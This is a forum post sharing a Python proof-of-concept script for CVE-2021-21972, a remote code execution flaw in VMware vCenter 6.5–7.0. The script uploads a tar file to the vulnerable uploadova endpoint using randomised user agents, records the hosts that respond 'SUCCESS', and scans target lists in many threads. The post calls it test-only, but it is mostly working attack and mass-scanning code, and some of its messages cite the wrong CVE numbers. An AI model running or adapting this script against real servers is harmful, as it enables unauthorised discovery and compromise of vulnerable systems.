CVE-2021-21972-vCenter-6.5-7.0-RCE-POC

#107
Topic created · 1 Posts · 6 Views
  • CVE-2021-21972-vCenter-6.5-7.0-RCE-POC

    poc Just verify the return status of someone's path

    POC For testing only, NO EXP module is added

    POC仅用于测试,未加入exp模块

    image

    alt text

    Code

    #-*- coding:utf-8 -*-
    banner = """
            888888ba             dP                     
            88    `8b            88                     
           a88aaaa8P' .d8888b. d8888P .d8888b. dP    dP 
            88   `8b. 88'  `88   88   Y8ooooo. 88    88 
            88    .88 88.  .88   88         88 88.  .88 
            88888888P `88888P8   dP   `88888P' `88888P' 
       ooooooooooooooooooooooooooooooooooooooooooooooooooooo 
                    @time:2021/02/25 CVE-2021-21972.py
                    C0de by NebulabdSec - @batsu                  
     """
    print(banner)
    
    import threadpool
    import random
    import argparse
    import http.client
    import urllib3
    import base64
    import requests
    
    
    urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
    http.client.HTTPConnection._http_vsn = 10
    http.client.HTTPConnection._http_vsn_str = 'HTTP/1.0'
    
    TARGET_URI = "/ui/vropspluginui/rest/services/uploadova"
    def get_ua():
        first_num = random.randint(55, 62)
        third_num = random.randint(0, 3200)
        fourth_num = random.randint(0, 140)
        os_type = [
            '(Windows NT 6.1; WOW64)', '(Windows NT 10.0; WOW64)', '(X11; Linux x86_64)',
            '(Macintosh; Intel Mac OS X 10_12_6)'
        ]
        chrome_version = 'Chrome/{}.0.{}.{}'.format(first_num, third_num, fourth_num)
    
        ua = ' '.join(['Mozilla/5.0', random.choice(os_type), 'AppleWebKit/537.36',
                       '(KHTML, like Gecko)', chrome_version, 'Safari/537.36']
                      )
        return ua
    
    
    def CVE_2021_21972(url):
        # proxies = {"scoks5": "http://127.0.0.1:1081"}
        proxies = {
            "http": "http://127.0.0.1:8080",
            "https": "http://127.0.0.1:8080",
        }
        headers = {
            'User-Agent': get_ua()
        }
        # data = base64.b64decode(Payload)
        # files = {'uploadFile': open('all.tar', 'rb')} #linux
        files = {'uploadFile': open('test.tar', 'rb')} #win
        targetUrl = url + TARGET_URI
        try:
            res = requests.post(url=targetUrl,
                                headers=headers,
                                files=files,
                                verify=False,
                                proxies=proxies)
                                # proxies={'socks5': 'http://127.0.0.1:1081'})
            if res.status_code == 200 and "SUCCESS" in res.text:
                print("[+] URL:{}--------存在CVE-2021-21872漏洞".format(url))
                # print("[+] Command success result: " + res.text + "\n")
                with open("存在漏洞地址.txt", 'a') as fw:
                    fw.write(url + '\n')
            else:
                print("[-] " + url + " 没有发现CVE-2020-14882漏洞.\n")
        # except Exception as e:
        #     print(e)
        except:
            print("[-] " + url + " Request ERROR.\n")
    def multithreading(filename, pools=5):
        works = []
        with open(filename, "r") as f:
            for i in f:
                func_params = [i.rstrip("\n")]
                # func_params = [i] + [cmd]
                works.append((func_params, None))
        pool = threadpool.ThreadPool(pools)
        reqs = threadpool.makeRequests(CVE_2021_21972, works)
        [pool.putRequest(req) for req in reqs]
        pool.wait()
    
    def main():
        parser = argparse.ArgumentParser()
        parser.add_argument("-u",
                            "--url",
                            help="Target URL; Example:http://ip:port")
        parser.add_argument("-f",
                            "--file",
                            help="Url File; Example:url.txt")
        # parser.add_argument("-t",
        #                     "--tar",
        #                     help="Create tar File; Example:test.tar")
        # parser.add_argument("-c", "--cmd", help="Commands to be executed; ")
        args = parser.parse_args()
        url = args.url
        # cmd = args.cmd
        file_path = args.file
        # jsp = args.tar
        # if jsp != None:
        #     print(jsp)
        #     generate_zip(jsp)
        if url != None and file_path ==None:
            CVE_2021_21972(url)
        elif url == None and file_path != None:
            multithreading(file_path, 10)  # 默认15线程
    
    if __name__ == "__main__":
        main()
    

    ==> Link here

Log in to reply